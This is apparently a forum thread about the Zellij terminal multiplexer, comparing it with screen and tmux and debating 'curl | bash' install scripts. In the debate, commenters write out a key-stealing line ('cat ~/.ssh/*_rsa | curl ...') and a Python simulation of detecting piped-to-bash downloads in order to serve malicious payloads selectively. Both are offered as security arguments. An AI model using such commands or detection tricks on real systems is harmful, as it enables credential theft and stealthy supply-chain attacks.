They just merged sixel support (the oldest images-in-terminals protocol).
Which shows that they are going places GNU Screen and tmux have never wanted to go.
In Zellij you can scroll through and flip between different terminals that show sixel images; it's quite neat knowing that such leaps are being made.
Meanwhile, as a longtime GNU Screen user, I've been using workarounds to pass through hyperlink markup (ls --hyperlink) and thinking about what I could do if there were sixel or other image protocol support. Zellij already supports hyperlinks just fine, and now images too, so it is very promising.
You've got my attention with the sixel support. I use screen quite heavily, but I'm open to switching for something like that.
I think I use screen in an unusual way, I know a few keyboard shortcuts but 99% of the time I use the command line.
If you press Ctrl-A :, you get a command line with tab completion to access all the screen commands. I have no idea what the shortcut is to split a window, because I just use :split. Same with :resize, :focus, :remove, :paste, :title, etc, etc. I'm quite happy with one less application I need to memorize bindings for, and I'm reluctant to give that up!
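For anyone who hasn't tried this mode: here are a few of the colon commands mentioned above, typed after Ctrl-A : (written from memory of standard screen behavior, so check `man screen` for exact arguments):

```
:split -v      # split the current region vertically
:focus next    # move focus to the new region
:screen        # attach a new shell window to it
:resize +10    # grow the focused region by 10 lines
:remove        # close the region (the window inside keeps running)
:title build   # rename the current window
```

Tab completion works on all of these, which is what makes the command line discoverable in the first place.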
Makes sense - I am 71 years old, and when I get really used to software I don't like to change. For example, I am celebrating my 40th anniversary of having paid Common Lisp work. Using Mosh (sometimes) instead of SSH was a worthwhile change though.
Good news is that tmux lets you customize bindings, including the "leader" key, so I've adjusted my .tmux.conf to use the same bindings as screen, and I can switch between the two without retraining myself (for those rare cases when tmux is not present or cannot be installed on a server).
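As an illustration, a minimal screen-style remap in .tmux.conf might look something like this (a sketch; the exact binding choices are a matter of taste):

```
# ~/.tmux.conf: use screen's Ctrl-a as the prefix ("leader") key
unbind C-b
set -g prefix C-a
bind a send-prefix            # Ctrl-a a types a literal Ctrl-a, as in screen
bind C-a last-window          # Ctrl-a Ctrl-a jumps to the previous window

# screen-like split bindings
bind S split-window -v        # like screen's Ctrl-a S
bind | split-window -h        # like screen's Ctrl-a |
```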
I've been using Zellij on both Linux & Mac for around six months.
It's great! For someone who wants a terminal multiplexer but a) doesn't feel like learning all the idiosyncrasies of tmux and b) is OK with adding some configs in toml — it's ideal.
The downsides are that it's not perfectly stable — maybe once a month I get a panic — and some terminal cobwebs aren't encapsulated — e.g. it's not possible to use "[" in key mappings.
Let's skip the part about the idiosyncrasies of `tmux`; the big selling point of screen and tmux, besides multiplexing, is support for a detached state and being able to reattach later on.
Zellij seems to be targeted at the end user's local machine (desktop, laptop) rather than at being used on a server through ssh. Nothing bad about that, of course; this product is just not for me.
That's true, if they wanted to keep the look of the design, they should have used something like CSS or SVG with searchable text rather than a raw image.
I wish there was a CLI editor with a zellij-like UI. I'm a nano guy, but I think the menu bar could be made much richer.
Discoverability is #1 on my list for any new app. I don't want to spend weeks learning commands or referring to the manual to use functionality that I know is there. Over time I'll memorize the shortcuts for recurring patterns. For the rarer stuff I can go through the menu, explore my options, and get a tentative result using my own data.
Helix (https://helix-editor.com/) and Kakoune (https://kakoune.org/) both have keybindings that are discoverable through their UI. Helix has a small pop-up that shows you the keys you can chord and what command they perform, and Kakoune has a Clippy-like thing.
You could also use a thing like a neovim distribution that has which-key support.
I'd only recommend Helix (or kakoune) to someone willing to spend time learning keybindings. -- I do put helix in the same bucket as zellij as "exciting upcoming tools which are nice out of the box".
which-key (from emacs) is excellent, and I wish more programs adopted the idiom. I'd say in Helix's case, it's good for helping discover the long tail of features you don't use often. It'd be a struggle to use without learning some set of navigation/editing.
> I love that it's more discoverable, with the keybindings displayed more readily.
Do you miss it in tmux? Not that I remember all the hotkeys, but the 10 or so of them I use 99% of the time, for sure; for the rest there's just `<leader>+?` (`Ctrl+a ?` in my config), which shows your current bindings.
No, but I already spent time to learn tmux. (That, and I have the opinion that I'd rather keep any window fullscreen, and be able to quickly switch between windows; so I prefer having sessions of panes, rather than splitting panes).
I still think it's a neat feature for keyboard-driven interfaces to have. -- e.g. I'd rather poke around lazygit than tig.
User-friendly shortcuts? It uses Ctrl/Shift + function keys all around... Not user friendly for me: on my laptop I would either have to hit Ctrl/Shift + Fn plus one of the top-row keys, or go into the BIOS and reverse the top row so that I can press a function key directly, but then give up the possibility of hitting volume/brightness up/down... I am sure it works for some, though.
Please do not pipe scripts downloaded through curl into bash. Use a package manager. That way the downloaded binary can be verified against a checksum and/or GPG signing.
Please lend your own time and energy to generate packages for bespoke distributions and package managers. You will need: deb, rpm, apk, AppImage, casks, tars, and likely more. Make sure to spend your time submitting your package to maintainers for each repository/registry for each distribution and each distro version. Don't forget to test each and every permutation!
Is all that too hard? No problem. Stand up your own repository for each distribution mechanism and instruct the user to run a bunch of random curl and key handling commands to bind their machine to this new software-supply-chain attack channel. At least this 'potentially malicious' code is being checksummed/GPG verified!
-- the point --
'curl | sh' is inherently no different from a trust perspective than issuing a package installation command or installing a new repository source for a package manager. Each user makes the value judgement of whether they trust the software or not. You're free to run the 'curl' part and inspect the script, or contribute packages to the byzantine linux/unix ecosystem if it boils your blood that much.
It is inherently different, because it's been proven that you can detect the use of curl|bash server-side. This makes it possible to serve the malicious payload only to people who do that.
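The detection signal being referred to is backpressure: bash executes the script as it streams in, so a long-running command early in the script stalls the pipe, and the server sees its writes block. Here's a toy local simulation of that timing difference (a sketch, not the published technique: plain sockets stand in for HTTP, and a small sleep stands in for bash pausing to execute):

```python
import socket
import threading
import time

def timed_send(srv_sock, out):
    """The 'server': send a large script and time how long it takes to drain."""
    conn, _ = srv_sock.accept()
    # keep kernel buffers small so reader speed actually shows up in the timing
    conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 4096)
    payload = b"#" * 1_000_000          # a large "install script"
    t0 = time.monotonic()
    conn.sendall(payload)               # blocks while the reader stalls
    out.append(time.monotonic() - t0)
    conn.close()

def run(slow_reader):
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    out = []
    t = threading.Thread(target=timed_send, args=(srv, out))
    t.start()
    c = socket.socket()
    c.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 4096)
    c.connect(("127.0.0.1", port))
    while True:
        chunk = c.recv(4096)
        if not chunk:
            break
        if slow_reader:
            time.sleep(0.001)           # emulate bash pausing to execute
    c.close()
    t.join()
    srv.close()
    return out[0]

fast = run(slow_reader=False)   # like `curl URL > file`: drains quickly
slow = run(slow_reader=True)    # like `curl URL | bash`: backpressure delays the server
```

The server only sees its own `sendall` timing, yet that is enough to tell the two clients apart and serve a clean script to auditors and a dirty one to executors.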
But I'd agree that the hurdle of getting your package into system repositories is likely not worth it. People are free to compile it themselves, download it manually, or whatever floats their boat if they don't want to use the quick and easy install script... which they can audit by saving it to the filesystem before executing the file.
"It is inherently different, because it's been proven that you can detect the use of curl|bash server-side"
Malicious people do malicious things? I worry that we conflate trust with validity. Some package systems do it better than others, but in principle you trust that for example, a maintainer of a package repository is not serving you bad checksums and malicious content. After all these systems get their checksums/keys on-first-use, so you still need to make the trust judgement. And they could still change the responses based on your ip, user agent, or other metadata they have access to when you interact with the system.
To boil it down to my gripe, the comments about checksums/gpg signing being the reason to never 'curl | sh' make no sense until you can clear the trust argument first, which no one does. And once you do clear the trust argument, and conclude the source is trustworthy, we can have a more technical debate on the distribution mechanism itself and what makes sense from that perspective.
edit: forgot to add, 'curl | sh' is also a trust on-first-use scenario just like with package ecosystems.
I think I wasn't clear enough so I'll try to rephrase it:
A compromise from a malicious curl|bash script is basically impossible to detect.
All other avenues at least give you the potential ability to figure out how you were compromised after the fact.
With curl|bash there is no trail and you can never find out which commands were actually executed, because the server providing the script can detect the |bash and serve its malicious payload only in that case.
Thanks for the clarification, I see now what you're getting at. I agree that having proper packages makes sense at some point in a project's maturity, as you have more infrastructure, checks, and gates to ensure that what you requested is 'valid', and the system produces enough logs/data to compare against other systems to detect drift/compromise. I tend to see that if a project gets popular enough, with enough eyeballs/contributors, official packages become inevitable.
Since we've passed the trust gate up to this point for discussion purposes, I still wonder if there is a better model for young projects. It's not just that we have multiple package formats; it's the per-distro/version matrix that tends to bite small developers and projects on time commitment. I would like to see something better than 'curl | sh' that is practical and portable across the unix-y ecosystem. Perhaps a third-party checksum db that caches valid script hashes, ala golang's sumdb or similar. Seems ripe for improvement.
> because it's been proven that you can detect the use of curl|bash server-side.
Sure, but what you're missing is that this argument would also strike down package managers. For example, you could similarly fingerprint the difference in behaviors for apt-get vs normal http utilities and only serve malicious packages to people grabbing via apt (likely someone trying to run the code) vs downloading in a browser or via curl/wget (most likely an auditor). This is trivial to do and of course individual packages as well as entire package delivery mechanisms have been compromised.
Please don't contribute worthless and irrelevant comments like this. As you doubtless well know, piping from curl into bash is something that a large subset of respected programmers think is reasonable, and another rather tedious subset do not. For example, the entire Rust community clearly has a consensus that it's reasonable: https://rustup.rs/ As does homebrew https://brew.sh/ and pyenv https://github.com/pyenv/pyenv-installer#install to name whatever came to my mind in 30s thought.
Since the debate has such large numbers on both sides, your individual opinion on it is neither interesting nor germane.
Why do you think your opinion is more valuable than that to which you reply?
For what it's worth, I can rattle off many more project names at random in 30s, and odds are they'll all have installation methods that aren't curl-pipe-shell, there are just so many more of them.
Please read what I wrote more carefully: I wasn't giving an opinion (other than the word "tedious"). I was pointing out the fact that there are large numbers of experienced software engineers on both sides of this argument, and hence it isn't an argument that can be settled, or even helpfully contributed to, by individuals giving their opinions. It's got to the point where it's more like politics or religion or something.
I for one think that this individual opinion has value under this post as a PSA to people who might not otherwise give the command a second thought, regardless of the conclusion they take away.
"a bunch of folks do something insecure" is not an argument.
The argument is that it is insecure. The simplest demonstration: I can inject "cat ~/.ssh/*_rsa | curl ..." into the script and get your company's ssh keys. There's no reason rust, brew and all the rest can't provide a download page with a checksum. They choose not to, like this project chose not to, because it doesn't look as sexy.
Sure you can, but there's always going to be trust somewhere. I trust that the curl | bash examples I see are from reputable sources, and I trust their infra as much as someone else's to be safe (https protects MITM attacks). NixOS is a cool example of complete package transparency with their binary cache, if your expressions don't evaluate the same as theirs you'll build from source.
But really, curl | bash isn't the end of the world.
If they do it against a GitHub URL they also have the security of GitHub behind them, because you can't differentiate on user agent there, which seems to be the commonly argued pitfall, or by other means of detecting that you're not a browser; on a hosted platform you have someone else's security team behind your back.
If someone has pulled off a sophisticated enough attack to intercept your http curl of the script and inject a malicious version, why can't they also intercept your browser http requests for the download page and inject different html that gives a good hash/checksum of the malicious script?
Going even further, what is stopping a malicious attack on the package source itself--like someone gaining control of the package source and committing a malicious version (as NPM, pypi and other registries have seen)?
The point is, "use your package manager" is not any better in the grand scheme of things than blindly curling and executing a script. Neither option is perfectly secure.
No, the concern is not your computer is compromised. Yours is a low-value target, sorry.
It's their http server, or a machine that feeds that http server, which is a good target for a compromise. Injecting a little bit of malicious code that steals something, or installs a fileless piece of malware, would bring massive benefits to the perpetrator, even if the exploit is short-lived.
That shell script should be a zip (gzip, xz) file, with a sha256 hash of it published on a different, separately hosted resource.
Maybe we should provide a utility that just does that in one command. It could even be a shell script...
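To make the idea concrete, here's a minimal sketch of such a "fetch, verify, then run" helper, in Python for brevity (the function name and the convention of a separately published sha256 are assumptions, not an existing tool):

```python
import hashlib
import subprocess
import tempfile
import urllib.request

def fetch_verify_run(url, expected_sha256):
    """Download a script, refuse to run it unless it matches an
    out-of-band sha256 hash. Hypothetical helper, not a real tool."""
    data = urllib.request.urlopen(url).read()
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"checksum mismatch: got {actual}")
    with tempfile.NamedTemporaryFile("wb", suffix=".sh", delete=False) as f:
        f.write(data)
        script_path = f.name
    # only executed once the content matches the separately published hash
    return subprocess.run(["sh", script_path]).returncode
```

The crucial design point is that `expected_sha256` comes from a different channel than the script itself, so a single compromised host can't swap both at once.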
Realistically a poisoned ARP or DNS attack that redirects your machine's traffic to the attacker's server, both for the download and the download page, is something to be concerned about. This only requires someone to have access to your local network, not to your machine. It could be as innocent as working at a coffee shop from their wifi network and an attacker being on it too...
It could, but I can trust that no individual stepped in the middle of that process.
I trust Rust to not put such a thing in their binary. I do not trust an arbitrary man in the middle, and it's trivial to modify a shell script.
Without a checksum, I can't ensure the binary I'm piping through the shell is the binary they posted and built. Anyone can step in, modify a few lines, and get access to a large part of my system. The barrier to entry for adding such capability to arbitrary binaries is outrageously high by comparison.
Install scripts are usually hosted on GitHub/etc and changes are clearly tracked. Compiled binaries are untracked and do not offer the same guarantees. I would trust the script more than a binary that could’ve been modified anywhere along the build process.
Not everyone uses Linux, and not every package can be audited by repo devs. It’s simply not scalable.
Trusting it because other people trust it for no apparent reason does not seem like a very compelling argument. For all I know, the Rust and homebrew communities know squat about how to securely deliver binaries.
I wish I could upvote da39a3ee's comment 100 more times. I hate condescending know-it-all people, and da39a3ee stated this way more eloquently than I would have.
Do you mean for the original comment complaining about the script?
> Please don't complain about tangential annoyances—things like article or website formats, name collisions, or back-button breakage. They're too common to be interesting.
> Avoid unrelated controversies, generic tangents, and internet tropes.
> Please don't post shallow dismissals, especially of other people's work.
> Please don't pick the most provocative thing in an article or post to complain about in the thread. Find something interesting to respond to instead.
This actually doesn't protect you the way you think it does. Using a simple check of the user agent which makes the request, an innocuous file may be served to browser requests, while an infected file may be served to cURL requests.
I love Zellij - have been using it for the last eight months. However, I wish it had a real programming language for configuration (since a program like this can be so versatile) instead of TOML.
Not to be dismissive, but I have no idea why I should want to install this. I actually just spent a few hours setting up a tmux configuration yesterday, so I feel like I'm in the target audience for this, but...
I can configure panels with YAML, it looks like. Why would I want to change my resizable panes for a set of static ones? It supports arbitrary plugins, it says. But can't I just run any program in tmux, so what is the point? The screenshots seem to mostly show how loud and colorful the chrome is, which seems distracting. And then the roadmap seems to be the only feature list; does that mean the software is actually "batteries-will-eventually-be-included"?
Hey, Zellij dev here. I'll try to answer your questions:
- regarding layouts/panes: the panes you configure in the layouts are still resizable at runtime. It just saves you the initial setup. In Zellij you also have a generic non-directional "do what I want" resize, btw.
- regarding plugins: the plugin system is indeed very much a work in progress, mostly because we're an OSS volunteer project and the person in charge of it had to AFK for a while. That being said, I think it's not very difficult to imagine how plugins will be different from normal apps? Think about interaction with panes/layouts, easy distribution, interaction with the terminal assets themselves (imagine custom expandable folds depending on content, notifications depending on content, etc.) and more along those lines.
> regarding layouts/panes: the panes you configure in the layouts are still resizable at runtime. It just saves you the initial setup.
I might use a "save current layout as a template" command, I guess. But I don't think I'd ever bother to learn the custom configuration format for building these myself. If you already have such a command, I'd suggest highlighting that on the site instead of a screenshot of YAML.
> imagine custom expandable folds depending on content, notifications depending on content
OK, this seems like it might be interesting to play with. Is there any "killer plugin" for it yet?
I haven't tried Zellij, but it looks interesting. This is a great feature, and I think incorporating it into the base software reflects good UX priorities.
Multiplexers are useful when logging in to a remote server. You can open a bunch of things without a separate ssh session for each, and you avoid broken connections cancelling your long-running jobs (that got me a couple of times when migrating data).
I also use iTerm2 on macOS, with tmux. Here are the main reasons why I do that:
- I can create window splits running multiple shell sessions in each pane, and then "zoom" in to an individual pane to focus on what I'm doing in that shell session.
- I can organize my work into named sessions, with multiple windows within each session, and panes within each window, and navigate between these using the keyboard.
- I can persist that session/window/pane structure across machine reboots (tmux-resurrect). The result is that I always have the same set of tmux shell sessions running, corresponding to the different projects that I work on.
- The same keybindings for session/window/pane management work whether I'm on MacOS or on a remote linux machine running tmux.
But I'm not a very advanced tmux user and there's a lot more I could do. If you look through the tmux feature set it will give you an idea of what you can do beyond what you can do with iTerm2. iTerm2 does have its own "tmux integration mode" but that's never quite appealed to me: I use tmux specifically because I want the tmux style of window splits etc, and because I want the familiar keybindings to be the same when I'm on a linux machine. So placing tmux behind the iTerm2 UI isn't what I'm personally looking for. I think! Or maybe I've misunderstood the iTerm2 feature.
The interface is very discoverable, unlike screen or tmux. You can start using it productively even before reading any documentation. The keybindings feel like a cross between vim (modal) bindings and CUA bindings.
One thing that is still a bit weird is that the displayed keybindings don't reflect your configuration, so if you use an alternative config you'll see the wrong bindings for some things all the time.
I assume Neovim users don't need to care about this, thanks to the built-in terminal and the ability to split, resize and switch between terminals using standard vim key bindings.
I'm the original Zellij creator. I am and have long been a vim user.
I created this tool originally for people like us. It has lots and lots of extra features and functionality (eg. opening the current pane scrollback inside your default editor in-place).
> opening the current pane scrollback inside your default editor in-place
Wow, that was my favorite feature in dvtm. I'll definitely check it out because while I mostly just use terminal buffers in NeoVim I always get so annoyed that moving the cursor is only possible letter by letter with arrow keys, which is ironic because every bash terminal supports basic inline Vim navigation.
Little comment about the website: I think it would be better to show the content of the About page (or a summary) on the start page instead of just telling people to install a program they don't know anything about. "Terminal workspace with batteries included" can mean almost anything.
But for the Neovim users (including myself), this is handy if they would like to use other applications besides neovim while keeping their neovim session open.
It uses the (n)vim remote API with tmux to maintain a global (n)vim session and redirects files opened via `vmux` back to the global session and switches to the window in tmux that session is visible in.
Hints:
- use `pipx` [2] to install `vmux` to make it available globally so you don't need to mess around with virtual environments.
- just `alias nvim=vmux`, and use `command nvim` if you need the real thing.
- I set the following in my profile file:
    export VMUX_EDITOR="nvim"
    export VMUX_GLOBAL="true"
    alias nvim=vmux
I say this as a vim user, but it reminds me of what nano is compared to vim. With zellij, you can jump in blind and learn how it works. Compared to tmux, which is great, but like vim, requires more upfront learning.
And the configuration is awesome. I’ve defined workspaces that look like a sophisticated IDE with little effort. It always seemed to be more effort doing the same in tmux.
Serious Q: has a serious emacs user checked this out? It looks exciting, but I'm a full-time, long-time, emacs -nw multi-buffer M-x shell user. Am I going to be disappointed because either it's not going to let me run emacs in its sub-windows, or it will have unresolvable key binding incompatibilities?
Hey, Zellij dev here. You should have no issue running emacs inside a Zellij pane. There might be some keybindings collisions, but you can always configure your way out of it if you like.
In general the problem of colliding keybindings is a hard one, and one we plan to address in the near future as we chip away at some technical debt that stands in our way.
As a serious emacs user, this looks like a stripped down version of emacs. There's no reason to use this if you're already using emacs. Its UI even looks like emacs, with the modeline and minibuffer.
I had similar thoughts when seeing that it uses WebAssembly to provide plugins. If they rewrite the core functionality with that and add an editor, then they've basically reinvented emacs (though with less flexibility, because the plugin code is compiled). As an emacs user I find the plugin sandboxing idea interesting, because security is basically missing from emacs packages. You just have to trust or review what you're installing.
Terminal support in emacs isn't super great, so there's definitely room for improvement there. Maybe there's even room for Zellij and emacs to integrate via plugins. That could be quite interesting. I still use emacs and tmux side by side without any integration.